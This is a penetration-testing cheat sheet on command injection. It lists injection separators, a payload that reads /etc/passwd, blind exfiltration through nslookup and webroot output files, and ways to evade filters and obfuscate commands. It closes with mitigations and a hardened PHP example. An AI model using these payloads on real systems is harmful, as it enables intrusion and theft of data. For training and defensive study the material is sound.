Command injection

commandinjections command_injection oscommandinjection owasptop10 picklerick ignite chillhack sau celestial busqueda php_command_injection command_injection_filter_bypass command_injection command_simple command_blind_output_redirection

A command injection occurs when a developer uses user input in system commands without proper sanitization or other protective measures.

For instance, a PHP website on Linux might use grep, sed, or other utilities instead of PHP functions for some operations:

$search = $_GET['q'];
$res = system("grep \"$search\" content/");
echo "<pre>$res</pre>";

With the following payload for q: " -V; cat /etc/passwd #, the executed command becomes the one below, allowing us to steal /etc/passwd:

grep "" -V; cat /etc/passwd # content/
grep "" -V || cat /etc/passwd || content/ # alternative

There are two kinds of command injections:

  • Regular/in-band: same channel to attack and gather results
  • Blind/out-of-band: different channels to attack and gather results
    • Using redirections/flags, create a URL-accessible output file
[...] cat /etc/passwd > /var/www/html/output.txt [...]
    • Using nslookup to perform a DNS exfiltration
[...] nslookup `whoami`.domain.com [...]
    • Using commands such as sleep to perform a time-based attack
[...] true && sleep 5 [...]

Basic Overview

Assuming we have a list of elements, such as forms, that may be vulnerable, we can try common payloads:

  • ; -- %3B -- run two commands
  • && -- %26%26 -- executed if the previous ones succeed
  • || -- %7C%7C -- executed if the previous ones failed
  • & -- %26 -- run two commands (background previous)
  • | -- %7C -- run two commands (pipe previous one)
  • `` -- %60%60 -- execute a command in another command
  • $() -- %24%28%29 -- execute a command in another command
  • \n or \r\n -- %0A or %0d%0a -- run two commands
  • !x -- bash-specific -- replaced with a command in the history
  • {ls,-la} -- bash-specific -- replaced with ls -la

Always try to inject bit by bit using a boolean-based approach.

Tools 📚

  • Commix (4.6k ⭐) can detect and automatically exploit vulnerable applications. It is designed in a similar way to SQLMap for SQL injections.
$ pipx install git+https://github.com/commixproject/commix.git
$ commix -u 'URL' -d 'xxx=*' # POST request, xxx vulnerable
$ pipx install git+https://github.com/QuentinRa/onectf.git
$ onectf request -u 'URL' -v -X POST -p 'xxx' -i 'x;id'
$ onectf request -u 'URL' -v -X POST -p 'xxx' -i 'x;ls<tab>/'
$ onectf request -u 'URL' -v -X POST -p 'xxx' -i 'x;ls /' --tamper aliases,space2tab

📚 The wordlist special-chars.txt can be handy.


Bypass filters

bypass_bash_restrictions

Character Filtering

chillhack

Bypass space character filtering.

  • Try using tabs (%09)
  • Try using variables (${IFS})
  • Try using brace expansion ({ls,-la}) -- bash
  • ...

Bypass braces/star character filtering.

  • You can replace ls${IFS}/ with ls$IFS""/
  • You can replace ls${IFS}/ with ls$IFS\/
  • You can replace cat${IFS}* with cat$IFS$(ls)

Bypass slash character filtering.

  • Try using variables (${PATH:0:1}) -- may not be set
  • Try using variables (${HOME:0:1}) -- may not be set
  • Try using variables (${PWD:0:1})
  • ...

➡️ See also: printenv, env, set, export to list environment variables.

Bypass using obfuscation

Remember that such payloads may contain filtered characters. See also tools such as Bashfuscator.

$ $(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$ $(a="WhOaMi";printf %s "${a,,}")
$ # using base64
$ base64 <<< whoami
d2hvYW1pCg==
$ bash<<<$(base64 -d<<<d2hvYW1pCg==) # whoami
$ # using UTF-16 and base64
$ echo -n whoami | iconv -f utf-8 -t utf-16le | base64

Command Filtering

chillhack powershell_basic_jail

  • Add a pair of quotes/double quotes anywhere within the command

# Available on Linux, Windows (PowerShell)
$ w'ho'ami ; w""hoam''i
  • Put \\ or $@ anywhere within the command
# Available on Linux
$ w\hoami ; who$@ami
  • Put ^ anywhere within the command
# Available on Windows (CMD)
CMD> who^am^i
  • Reverse commands
$ $(rev<<<'imaohw')
PS> iex "$('imaohw'[-1..-20] -join '')"
  • Filters may have been applied only once
PS> cat # It doesn't work.
PS> ccatat # It works!
  • Use variables to split the command
PS> $a="l"; $b="s" ; & $a$b

Additional Notes

Refer to injection if you need to inject something in the arguments of a custom script.

Maltrail v0.53

sau

PoC (Python script) (0.04k ⭐).

$ python3 exploit.py listener_ip listener_port URL

PowerShell Command Injection

powershell_command_injection powershell_basic_jail

Reminder of useful payloads: $(whoami), ; whoami, $(Get-ChildItem Env:), $(command|Out-string), | powershell command...


Mitigation 🛡️

  • 🪲 Avoid using uncontrolled input in system commands. Always validate and filter user input.

  • 🔫 Use the web engine functions instead of system functions.

  • 📚 Use additional tools such as a WAF, etc.

As always, we can configure the server to block some functions or disable access to folders outside the application directories.
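The grep search from the introduction and the mitigations listed above, as an added example that is not part of the original notes: the same lookup written as the notes' vulnerable call, as a hardened shell call, and without any shell at all. The content/ directory, the 100-character limit and the function names are assumptions of this example; PHP 8 is assumed for str_contains().

```php
<?php
// Added example (not from the original notes): the grep search from the
// introduction written three ways. $search is the untrusted $_GET['q'].

// 1. Vulnerable, as in the notes: the value is spliced into the command
//    line, so q = " -V; cat /etc/passwd # closes the quotes and appends a
//    second command. shell_exec() replaces system() only so the output is
//    returned rather than echoed.
function search_vulnerable(string $search): string
{
    $out = shell_exec("grep \"$search\" content/");
    return is_string($out) ? $out : '';
}

// 2. Hardened shell call (Linux): escapeshellarg() single-quotes the value,
//    so ; | & $() `` and newlines stay literal data. '--' ends option
//    parsing, so a value starting with '-' (the -V above) is the pattern,
//    not a grep flag. -F keeps regex metacharacters literal; -r for a dir.
function search_hardened(string $search): string
{
    // Constructed allow-list: reject empty, oversized or NUL-bearing input.
    if ($search === '' || strlen($search) > 100 || str_contains($search, "\0")) {
        return '';
    }
    $out = shell_exec('grep -rF -- ' . escapeshellarg($search) . ' content/');
    return is_string($out) ? $out : '';
}

// 3. Preferred: no shell at all. PHP walks the directory and matches the
//    string itself, so there is no command line for the input to reach.
function search_native(string $search, string $dir = 'content/'): array
{
    if ($search === '') {
        return [];
    }
    $hits = [];
    foreach (glob($dir . '*') ?: [] as $file) {
        $lines = is_file($file) ? file($file, FILE_IGNORE_NEW_LINES) : false;
        if ($lines === false) {
            continue;
        }
        foreach ($lines as $n => $line) {
            if (str_contains($line, $search)) {
                $hits[] = $file . ':' . ($n + 1) . ':' . $line;
            }
        }
    }
    return $hits;
}
```

With the hardened form, the payload from the notes reaches grep as a single quoted argument to search for, rather than as a second command.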


👻 To-do 👻

Stuff that I found but have never read/used yet.

  • Windows Slash ($env:HOMEPATH[0])
  • Direct access to a program in a jail?
  • "'`{ls,-a}`'" (error but execute)